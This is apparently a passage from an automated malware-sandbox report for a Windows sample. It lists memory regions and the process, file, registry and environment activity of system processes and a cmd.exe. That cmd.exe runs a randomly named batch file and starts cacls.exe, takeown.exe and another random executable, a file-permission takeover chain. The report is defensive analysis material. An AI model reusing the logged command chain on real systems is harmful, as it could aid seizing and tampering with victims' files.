| private_0x000000b430a50000 | 0xb430a50000 | 0xb430a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430a60000 | 0xb430a60000 | 0xb430a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430a70000 | 0xb430a70000 | 0xb430a70fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430a80000 | 0xb430a80000 | 0xb430b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430b80000 | 0xb430b80000 | 0xb430c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430c80000 | 0xb430c80000 | 0xb430cfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430d00000 | 0xb430d00000 | 0xb430dfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430e00000 | 0xb430e00000 | 0xb430efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b430f00000 | 0xb430f00000 | 0xb430ffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431000000 | 0xb431000000 | 0xb4310fffff | Private Memory | rw |
|
|
|
- |
| dosvc.dll.mui | 0xb431100000 | 0xb431100fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b431200000 | 0xb431200000 | 0xb4312fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431380000 | 0xb431380000 | 0xb43147ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0xb431500000 | 0xb4315defff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b4315e0000 | 0xb4315e0000 | 0xb4315e0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b4315f0000 | 0xb4315f0000 | 0xb4315f3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431600000 | 0xb431600000 | 0xb4316fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431780000 | 0xb431780000 | 0xb43187ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b431880000 | 0xb431880000 | 0xb43197ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000b431980000 | 0xb431980000 | 0xb431981fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431990000 | 0xb431990000 | 0xb431a8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b431a90000 | 0xb431a90000 | 0xb431a9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b431aa0000 | 0xb431aa0000 | 0xb431aaffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b431ab0000 | 0xb431ab0000 | 0xb431abffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b431ac0000 | 0xb431ac0000 | 0xb431acffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b431ad0000 | 0xb431ad0000 | 0xb431adffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000b431ae0000 | 0xb431ae0000 | 0xb431aeffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000b431af0000 | 0xb431af0000 | 0xb431af0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431b00000 | 0xb431b00000 | 0xb431b06fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431b10000 | 0xb431b10000 | 0xb431c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431c90000 | 0xb431c90000 | 0xb431d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431d90000 | 0xb431d90000 | 0xb431e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431e10000 | 0xb431e10000 | 0xb431f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431f10000 | 0xb431f10000 | 0xb431f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b431f90000 | 0xb431f90000 | 0xb43200ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432010000 | 0xb432010000 | 0xb43208ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432090000 | 0xb432090000 | 0xb43210ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432110000 | 0xb432110000 | 0xb43220ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432210000 | 0xb432210000 | 0xb43230ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432310000 | 0xb432310000 | 0xb43240ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432410000 | 0xb432410000 | 0xb43248ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432490000 | 0xb432490000 | 0xb43258ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432590000 | 0xb432590000 | 0xb43268ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432690000 | 0xb432690000 | 0xb43278ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432790000 | 0xb432790000 | 0xb43288ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432890000 | 0xb432890000 | 0xb43290ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b432910000 | 0xb432910000 | 0xb43295cfff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000b432960000 | 0xb432960000 | 0xb43296ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432970000 | 0xb432970000 | 0xb432976fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432980000 | 0xb432980000 | 0xb432a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432a80000 | 0xb432a80000 | 0xb432afffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432b00000 | 0xb432b00000 | 0xb432bfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432c00000 | 0xb432c00000 | 0xb432cfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b432d00000 | 0xb432d00000 | 0xb432dfffff | Private Memory | rw |
|
|
|
- |
| datastore.edb | 0xb432e00000 | 0xb432e0ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432e10000 | 0xb432e1ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432e20000 | 0xb432e2ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432e30000 | 0xb432e3ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432e40000 | 0xb432e4ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432e50000 | 0xb432e5ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432e60000 | 0xb432e6ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432e70000 | 0xb432e7ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432e80000 | 0xb432e8ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432e90000 | 0xb432e9ffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432ea0000 | 0xb432eaffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432eb0000 | 0xb432ebffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432ec0000 | 0xb432ecffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432ed0000 | 0xb432edffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432ee0000 | 0xb432eeffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xb432ef0000 | 0xb432efffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b432f00000 | 0xb432f00000 | 0xb432ffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433100000 | 0xb433100000 | 0xb4331fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433200000 | 0xb433200000 | 0xb4332fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433300000 | 0xb433300000 | 0xb4333fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433400000 | 0xb433400000 | 0xb4334fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433500000 | 0xb433500000 | 0xb4335fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433600000 | 0xb433600000 | 0xb4336fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433700000 | 0xb433700000 | 0xb4337fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433800000 | 0xb433800000 | 0xb43384cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433850000 | 0xb433850000 | 0xb433857fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433860000 | 0xb433860000 | 0xb433866fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433870000 | 0xb433870000 | 0xb4338effff | Private Memory | rw |
|
|
|
- |
| datastore.edb | 0xb4338f0000 | 0xb4338fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b433900000 | 0xb433900000 | 0xb4339fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b433a00000 | 0xb433a00000 | 0xb433afffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 358 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #40: System
0
0
| Information | Value |
|---|---|
| ID | #40 |
| File Name | System |
| Command Line | - |
| Initial Working Directory | - |
| Monitor | Start Time: 00:02:03, Reason: Created Daemon |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4 |
| Parent PID | 0x108 (c:\windows\system32\smss.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
2C
0x
E5C
0x
13C
0x
F88
0x
F90
0x
F80
0x
F68
0x
61C
0x
148
0x
D18
0x
E08
0x
C98
0x
98C
0x
D1C
0x
F0C
0x
F4C
0x
F44
0x
F54
0x
F58
0x
F48
0x
F50
0x
B18
0x
E64
0x
E6C
0x
E84
0x
E74
0x
E70
0x
E68
0x
EEC
0x
EF0
0x
E78
0x
E7C
0x
EB0
0x
EC0
0x
2BC
0x
A44
0x
7C0
0x
63C
0x
618
0x
DC4
0x
858
0x
5C0
0x
C34
0x
C38
0x
C0C
0x
278
0x
910
0x
A90
0x
548
0x
A68
0x
820
0x
1C
0x
AEC
0x
AE8
0x
AC4
0x
AE4
0x
264
0x
CC
0x
138
0x
F90
0x
F84
0x
E8
0x
28
0x
CC8
0x
CA8
0x
C8
0x
80
0x
2C8
0x
B6C
0x
30
0x
798
0x
81C
0x
550
0x
158
0x
924
0x
A70
0x
B80
0x
60C
0x
790
0x
4B8
0x
0
0x
4F4
0x
AD0
0x
AC4
0x
9E0
0x
9D4
0x
97C
0x
970
0x
10
0x
C4
0x
7B8
0x
38
0x
648
0x
6C
0x
7F0
0x
7E8
0x
6A4
0x
6A0
0x
66C
0x
650
0x
5DC
0x
5D4
0x
598
0x
48
0x
174
0x
178
0x
4A4
0x
460
0x
130
0x
8C
0x
74
0x
D0
0x
350
0x
88
0x
144
0x
2C4
0x
70
0x
84
0x
3C
0x
148
0x
134
0x
B0
0x
44
0x
14
0x
1B0
0x
104
0x
78
0x
20
0x
A8
0x
17C
0x
170
0x
16C
0x
64
0x
164
0x
E4
0x
140
0x
7C
0x
34
0x
F0
0x
A4
0x
128
0x
C0
0x
BC
0x
B4
0x
60
0x
110
0x
B8
0x
EC
0x
8
0x
A5C
0x
18
0x
974
0x
688
0x
5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000003800000000 | 0x3800000000 | 0x3800000fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003800010000 | 0x3800010000 | 0x3800010fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003800020000 | 0x3800020000 | 0x3800020fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000003800030000 | 0x3800030000 | 0x380004ffff | Private Memory | rw |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #41: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #41 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:03:38, Reason: Self Terminated |
| Monitor Duration | 00:01:35 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x764 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
900
0x
EBC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x04a3ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04a5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a40000 | 0x04a40000 | 0x04a4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04a53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04a61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04a63fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a70000 | 0x04a70000 | 0x04a83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04bcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004bd0000 | 0x04bd0000 | 0x04bd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004be0000 | 0x04be0000 | 0x04be0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04bf1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c00000 | 0x04cbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004cc0000 | 0x04cc0000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x0507ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05080000 | 0x053b6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e600000 | 0x7e600000 | 0x7e6fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e700000 | 0x7e700000 | 0x7e722fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e728000 | 0x7e728000 | 0x7e728fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e729000 | 0x7e729000 | 0x7e72bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e72c000 | 0x7e72c000 | 0x7e72cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e72d000 | 0x7e72d000 | 0x7e72ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 8, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x64c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x56c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xb3c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = FN, result_out = "Graph.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Graph.jtp" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #42: smss.exe
0
0
| Information | Value |
|---|---|
| ID | #42 |
| File Name | c:\windows\system32\smss.exe |
| Command Line | \SystemRoot\System32\smss.exe |
| Initial Working Directory | C:\Windows |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x108 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
2A8
0x
114
0x
10C
|
Process #43: csrss.exe
0
0
| Information | Value |
|---|---|
| ID | #43 |
| File Name | c:\windows\system32\csrss.exe |
| Command Line | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x154 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
4B0
